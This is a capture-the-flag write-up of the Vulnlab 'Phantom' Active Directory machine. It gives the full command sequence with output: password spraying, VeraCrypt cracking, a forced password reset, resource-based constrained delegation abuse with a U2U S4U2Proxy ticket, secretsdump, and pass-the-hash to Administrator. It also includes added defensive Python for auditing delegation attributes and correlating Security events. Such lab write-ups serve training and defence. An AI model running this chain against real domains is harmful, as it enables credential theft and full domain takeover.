vulnlab-phantom
A medium Windows machine.
┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest:
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share
SMB         dc.phantom.vl   445    DC               Public          READ
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share
Enumerate domain users by RID cycling with the guest account (output saved to userlist.txt), then keep only the usernames by stripping the DOMAIN\ prefix and the SID type:
crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public
Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

                6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>
Viewing the .eml gives:
Welcome to Phantom!

Dear <NAME>

We are excited to have you on board. Below are your user credentials:

Username: <USERNAME>
Password: Ph<redacted>t!

Please log in to your account using these credentials. For security reasons, we strongly recommend that you change your password immediately after your first login.

If you have any questions or need assistance, feel free to reach out to our support team at techsupport@phantom.vl

Best regards,
The Phant
Spray the onboarding password from the email across the user list:
crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce
hashcat to recover the password of the VeraCrypt container IT_BACKUP_201123.hc (mode 13721, VeraCrypt SHA-512 + XTS 512-bit) with a custom wordlist and rule:
hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
Crawl the shares with spider_plus as ibryant, one of the accounts the spray hit:
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus
Inside the backup, the Vyatta config path /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/ holds the SSTP VPN local user lstanley with the plaintext password gB<redacted>Rc.
Spray the VPN password across the user list as well:
crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success
The VPN password is reused by svc_sspr, which also has WinRM access; collect BloodHound data with it:
crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp
Here comes the fun
net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"
crackmapexec ldap dc.phantom.vl -u crose -p Summer2024
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024
crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0
MachineAccountQuota is 0, so an unprivileged user cannot add a computer account to the domain.
Let’s delegate
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose   (S-1-5-21-4029599044-1972224926-2225194048-1126)
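What that command wrote is a binary security descriptor, and the defender's check is to read msDS-AllowedToActOnBehalfOfOtherIdentity back from every computer object (domain controllers first) and list the trustees in its DACL. The Python below is an added example, not from the writeup or from Impacket: the builder only constructs a sample descriptor for the SID shown above (the LDAP fetch is assumed to happen elsewhere), and the parser plus audit function do the check.

```python
import struct

ACCESS_ALLOWED_ACE = 0x00   # ACE type used by RBCD grants
SE_DACL_PRESENT = 0x0004    # SD control bit: the DACL offset is valid

def sid_to_bytes(sid):
    """Encode 'S-R-A-s1-s2-...' as a binary SID: revision, sub-authority count, 6-byte authority, LE subs."""
    parts = sid.split("-")
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def sid_from_bytes(buf, off):
    """Decode the binary SID starting at offset off back to its string form."""
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs))

def build_rbcd_descriptor(trustee_sids):
    """Constructed sample only: self-relative SD (control 0x8000) with one ACCESS_ALLOWED_ACE per trustee."""
    aces = b""
    for sid in trustee_sids:
        s = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE, 0, 8 + len(s), 0x000F01FF) + s  # full-access mask
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(trustee_sids), 0) + aces   # ACL_REVISION_DS = 4
    header = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, 0, 0, 0, 20)   # no owner/group/SACL
    return header + dacl

def rbcd_trustees(sd):
    """Return the SIDs granted in msDS-AllowedToActOnBehalfOfOtherIdentity (unset attribute -> [])."""
    if len(sd) < 20:
        return []
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE:
            sids.append(sid_from_bytes(sd, off + 8))
        off += ace_size
    return sids

def audit_rbcd(computers):
    """computers: sAMAccountName -> raw attribute bytes (b'' when unset). Any trustee on a DC is the finding."""
    return [(name, sid) for name, attr in computers.items() for sid in rbcd_trustees(attr)]

CROSE_SID = "S-1-5-21-4029599044-1972224926-2225194048-1126"    # SID printed by impacket-rbcd above
SAMPLE = {"DC$": build_rbcd_descriptor([CROSE_SID]), "WS01$": b""}  # constructed LDAP result set
```

On a real domain, resolve each returned SID to its account and treat any user or low-value computer listed on a DC as an incident, since only the DC itself should ever appear there if anything does.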
over-pass-the-hash
impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=crose.ccache
Read the session key of that TGT:
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
Set crose's NT hash to that session key:
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

[*] NTLM hashes were changed successfully.
Confirm the delegation entry is still in place using the new hash:
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose   (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose   (S-1-5-21-4029599044-1972224926-2225194048-1126)
impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
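Three of the steps above leave traces in the DC's Security log: the password reset by svc_sspr (event 4724), the write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136) and the S4U2Proxy ticket request (event 4769 with TransmittedServices populated). As an added example that is not part of the writeup, the Python below correlates those three over constructed sample records shaped like a SIEM's JSON export of the events; the DN, account names and field values are constructed from this box's names.

```python
import json

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"   # 5136 OperationType resource string for "Value Added"
DC_OU = "OU=Domain Controllers"

# Constructed sample records (not logs captured from the box): one JSON object per Security event,
# using the EventData field names Windows emits for each event ID.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 4724, "SubjectUserName": "svc_sspr", "TargetUserName": "crose"}),
    json.dumps({"EventID": 4724, "SubjectUserName": "helpdesk1", "TargetUserName": "helpdesk1"}),
    json.dumps({"EventID": 5136, "SubjectUserName": "crose", "AttributeLDAPDisplayName": RBCD_ATTR,
                "OperationType": VALUE_ADDED, "ObjectDN": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl"}),
    json.dumps({"EventID": 5136, "SubjectUserName": "crose", "AttributeLDAPDisplayName": "description",
                "OperationType": VALUE_ADDED, "ObjectDN": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl"}),
    json.dumps({"EventID": 4769, "TargetUserName": "Administrator@PHANTOM.VL", "ServiceName": "DC$",
                "TransmittedServices": "crose@PHANTOM.VL"}),
]

def detect(lines):
    """Return (severity, message) alerts; a reset account that later writes RBCD on a DC is escalated."""
    reset_by, alerts = {}, []
    for line in lines:
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 4724 and ev["SubjectUserName"] != ev["TargetUserName"]:
            reset_by[ev["TargetUserName"]] = ev["SubjectUserName"]
            alerts.append(("medium", "password of %s reset by %s" % (ev["TargetUserName"], ev["SubjectUserName"])))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR and ev.get("OperationType") == VALUE_ADDED:
            who, dn = ev["SubjectUserName"], ev["ObjectDN"]
            sev, msg = ("high" if DC_OU in dn else "medium"), "RBCD trustee added on %s by %s" % (dn, who)
            if who in reset_by:   # the chain on this box: svc_sspr resets crose, crose writes RBCD on DC$
                sev, msg = "critical", msg + " (account was reset by %s earlier)" % reset_by[who]
            alerts.append((sev, msg))
        elif eid == 4769 and ev.get("TransmittedServices", "-") not in ("", "-"):
            # TransmittedServices is only populated when the service ticket came from S4U2Proxy
            alerts.append(("high", "S4U2Proxy ticket for %s to %s via %s"
                           % (ev["TargetUserName"], ev["ServiceName"], ev["TransmittedServices"])))
    return alerts
```

Event 5136 is only written when "Audit Directory Service Changes" is enabled and the computer object carries a write-property SACL; without that, the attribute write above leaves no Security-log trace and only the LDAP audit of the attribute itself will catch it.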
impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::
evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'
That was fun.